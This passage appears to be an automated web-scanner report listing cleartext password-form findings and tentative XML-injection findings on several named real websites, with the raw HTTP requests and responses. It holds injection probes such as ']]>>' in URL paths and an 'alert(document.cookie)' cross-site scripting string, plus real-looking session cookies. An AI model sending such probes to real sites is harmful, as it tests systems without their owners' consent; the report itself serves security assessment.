8. Cleartext submission of password  previous  next
There are 6 instances of this issue:


8.1. http://support.moxiesoft.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:01:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Tue, 26 Apr 2011 21:01:06 GMT
Set-Cookie: ASPSESSIONIDQABACBCB=NHEPJGDDIMDAFCDMFDDMALJF; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...
<!-- login box starts -->
                                   <form id="frmNewLogin" name="frmNewLogin" method="post" action="login.asp">
                                   <input type="hidden" id="txtProductID" name="txtProductID">
...[SNIP]...
<td width="150"><input type="password" name="txtPasswd" id="txtPasswd" /></td>
...[SNIP]...

8.2. http://www.aac.org/site/TR/Events/AWB08  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aac.org
Path:   /site/TR/Events/AWB08

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 HTTP/1.1
Host: www.aac.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:44:06 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=839fd626r1.app209a; path=/
Content-Type: text/html
Content-Length: 26372

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<base href="http://www.aac.org/site/" />


<title>AIDS Walk Boston, Sunday, June 5, 2011: </title>
<meta http-equiv="C
...[SNIP]...
<td><form id="lLogonForm" name="lLogonForm" action="UserLogin?NEXTURL=TRC?fr_id=1110&amp;pg=center" method="post">

<table style="width: 155px;" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td class="login" width="85"><input id="Password" name="Password" type="password" size="12" maxlength="20" onselect="this.value='';" /></td>
...[SNIP]...

8.3. http://www.bcbst.com/inc/loginform.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /inc/loginform.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /inc/loginform.asp?t=0.5000415733084083 HTTP/1.1
Host: www.bcbst.com
Proxy-Connection: keep-alive
Referer: http://www.bcbst.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:37:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 837
Content-Type: text/html
Cache-control: private
Content-Length: 837


<script>

</script>
<div>
<form name="mainlogon"
       method="post"
       action="/signon/processlogon.do">

   <div class="user">
       <label>User ID:</label>
       <input name="dnqualifier"
           type="text
...[SNIP]...
</label><input name="userpassword" type="password"    id="password" class="text" onKeyPress="return enterSubmit(this.form, event)">
   </div>
...[SNIP]...

8.4. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;path=/
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:49:09 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...
</a>
       <form name="fbLoginForm" id="fbLoginFormID" action="/login/" method="post" class="genericForm ajaxForm" enctype="multipart/form-data">
           
       <div id="emailFormFieldContainer" class="textformFieldContainer formFieldContainer mandatory">
...[SNIP]...
<span class="inputWrapper">
                           <input type="password" name="password" id="passwordFieldID" class="formpassword " value="**********" onclick="if(this.value=='**********')this.value=''" />
                       </span>
...[SNIP]...

8.5. http://www.freemanco.com/store/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /store/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /store/?from=freemancofb27d'%3balert(document.cookie)//6c9edc3f802 HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; JSESSIONID=A69190F969B4B3882863F4380364FE84.node2; __utmz=95684043.1303850323.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=95684043.1984575328.1303848339.1303848339.1303850323.2; __utmc=95684043; __utmb=95684043.3.10.1303850323

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:59:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 87216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...
<div class="loginBox">

               <form action="?_DARGS=/store/.loginTopForm" method="post"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
<td>

                                   <input value="" type="password" title="Your password is case sensitive and must be between 4 and 25 characters long." style="width:142px;" name="/atg/userprofiling/ProfileFormHandler.value.password"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.password">
...[SNIP]...

8.6. http://www.widgetbox.com/account/login_lite.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetbox.com
Path:   /account/login_lite.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /account/login_lite.jsp HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2123435684-1303854386635; km_ai=ZEtF5LlpqXlV9eDTnhh0xLfL3xw; __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.4.10.1303854385; km_vs=1; km_lv=1303854392; km_uq=; node=1025

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:46:37 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Set-Cookie: node=1025; path=/
Connection: close
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?>


<wbx-response status="ok">
<wbx-remote-content type="login" title="Sign In"><![CDATA[

<div style="width:860px; text-align:left
...[SNIP]...
<div class="yui-u first" id="wbx-signin-form-div">
<form id="wbx-login-form" action="/account/login.action" method="post" onsubmit="return WbxSignIn.doSignIn(true)">
<div class="box-module">
...[SNIP]...
</label>
<input id="password" title="Password" maxlength="20" name="password" type="password" size="25" /> <span style="" id="forgot-pass" class="medium" title="Forgot your password?">
...[SNIP]...

9. XML injection  previous  next
There are 16 instances of this issue:


9.1. http://freemanco.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://freemanco.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: freemanco.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:08:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1053

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

9.2. http://platform.twitter.com/anywhere.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /anywhere.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /anywhere.js]]>>?id=3VXxrl7e9B3f66ejq9xow&v=1&ver=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 280
Date: Tue, 26 Apr 2011 21:03:24 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>anywhere.js]]&gt;&gt;</Key><RequestId>43A34E986909F87A</RequestId><HostId>d
...[SNIP]...

9.3. http://services.money.msn.com/quoteservice/streaming [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://services.money.msn.com
Path:   /quoteservice/streaming

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /quoteservice/streaming?format=json]]>>&symbol=EURUSD,%20GBPUSD,%20USDJPY,&callback=jsonp1303842964760 HTTP/1.1
Host: services.money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:39 GMT
Content-Length: 2070

<?xml version="1.0" encoding="utf-8"?><root><result><DynamicSymbology><Symbol>EURUSD</Symbol><CompanyName>Euro to US Dollar</CompanyName><Country>US</Country><Type>CurrencyExchange</Type></DynamicSymb
...[SNIP]...

9.4. http://use.typekit.com/k/bpi7eqn-e.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://use.typekit.com
Path:   /k/bpi7eqn-e.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /k]]>>/bpi7eqn-e.css?3bb2a6e53c9684ffdc9a9bf1135b2a62ecbeaca761fbe87f15aec123ab5093d026e6e1bb0d1ae7cef0cb4486ee99fc9c314d37b0c3e12286285b50bf357d600e4ecf2b4738aa7af9c135b2c105695ad3dd623449abf994d967461f6b4da1162454ed7f3aa00e56b7b2be79831a77ecd09428a672695e1a56a6d92392e4138295c64b8e8e4674fd339a538359c9fa05ea31d66dd5d81e07aa24a5916f02c4dfc3ff68716d18da38b53004367a7a6a526281673d HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Tue, 26 Apr 2011 21:07:13 GMT
Expires: Tue, 26 Apr 2011 21:12:13 GMT
Server: EOS (lax001/54D6)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.5. http://use.typekit.com/k/bpi7eqn-e.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://use.typekit.com
Path:   /k/bpi7eqn-e.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /k/bpi7eqn-e.css]]>>?3bb2a6e53c9684ffdc9a9bf1135b2a62ecbeaca761fbe87f15aec123ab5093d026e6e1bb0d1ae7cef0cb4486ee99fc9c314d37b0c3e12286285b50bf357d600e4ecf2b4738aa7af9c135b2c105695ad3dd623449abf994d967461f6b4da1162454ed7f3aa00e56b7b2be79831a77ecd09428a672695e1a56a6d92392e4138295c64b8e8e4674fd339a538359c9fa05ea31d66dd5d81e07aa24a5916f02c4dfc3ff68716d18da38b53004367a7a6a526281673d HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Tue, 26 Apr 2011 21:07:17 GMT
Expires: Tue, 26 Apr 2011 21:12:17 GMT
Server: EOS (lax001/54E5)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.6. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/xml/headerflash_config.xml.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bertelsmann_corp]]>>/wms41/xml/headerflash_config.xml.php?id=96|en|1303856364 HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:41:16 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 261
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /bertelsmann_corp]]&gt;&gt;/wms41/xml/headerflash_config.xml.php was not found on this server.</p>
...[SNIP]...

9.7. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/xml/headerflash_config.xml.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bertelsmann_corp/wms41]]>>/xml/headerflash_config.xml.php?id=96|en|1303856364 HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:41:23 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 261
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /bertelsmann_corp/wms41]]&gt;&gt;/xml/headerflash_config.xml.php was not found on this server.</p>
...[SNIP]...

9.8. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/xml/headerflash_config.xml.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bertelsmann_corp/wms41/xml]]>>/headerflash_config.xml.php?id=96|en|1303856364 HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:41:29 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 261
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /bertelsmann_corp/wms41/xml]]&gt;&gt;/headerflash_config.xml.php was not found on this server.</p>
...[SNIP]...

9.9. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/xml/headerflash_config.xml.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bertelsmann_corp/wms41/xml/headerflash_config.xml.php]]>>?id=96|en|1303856364 HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:41:35 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 261
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /bertelsmann_corp/wms41/xml/headerflash_config.xml.php]]&gt;&gt; was not found on this server.</p>
...[SNIP]...

9.10. http://www.freemanco.com/freemanco [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.freemanco.com
Path:   /freemanco

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /freemanco]]>>?fs=true&_requestid=118715 HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://freemanco.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:13:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1184

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

9.11. http://www.freemanco.com/freemanco/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.freemanco.com
Path:   /freemanco/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /freemanco]]>>/?fs=true&_requestid=118715 HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
